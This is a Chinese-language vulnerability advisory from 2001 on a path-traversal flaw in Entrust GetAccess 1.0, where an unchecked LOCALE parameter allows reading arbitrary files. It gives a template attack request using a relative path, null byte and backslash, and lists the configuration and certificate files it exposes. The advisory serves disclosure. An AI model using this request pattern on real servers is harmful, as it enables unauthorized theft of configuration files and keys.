Etrust getAccess[tm] 存在安全漏洞发布时间:2001-11-06 更新时间:2001-11-06 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Entrust GetAccess 1.0详细描述 "getAcess[tm]"使用默认的shellscripts来启动java-classe。 由于对输入验证没有很好的检查可以导致以getAccess权限读任意文件。如GetAccess提供语言本地化机制给一些HTML页面,如错误信息,超时信息等,使用不同的语言模板来显示,这种机制使用"LOCALE=XX_XX"参数来作为字符串来提交,XX_XX对应包含相对HTML模板的子目录。 漏洞存在于用户可以手工提交任意目录路径作为XX_XX的值而导致读取其他任意 文件内容。 测试代码 如下HTTP请求: http://getAccessHostname/sek-bin/helpwin.gas.bat? 带如下参数: &locale= [relative FILE/PATH] [Nullbyte/0x00] [Backslash/0x5c] 会导致泄露文件和路径: /config/acl-runtime.conf /config/administration.conf /config/applist.conf /config/authmethod.conf /config/clientCert.conf /config/connection.conf /config/directories.conf /config/domainAuth.conf /config/hook.conf /config/license.conf /config/log.conf /config/login.conf /config/misc.conf /config/pmda.conf /config/redirection.conf /config/registry.conf /config/serverCert.conf /config/serverConnection.conf /config/source_systems.conf /config/version.conf /config/serverReq.pem /config/serverCert.pem /config/certs 解决方案 尚无 相关信息 security@freefly.com rudicarell@hotmail.com http://www.freefly.com/security/ |
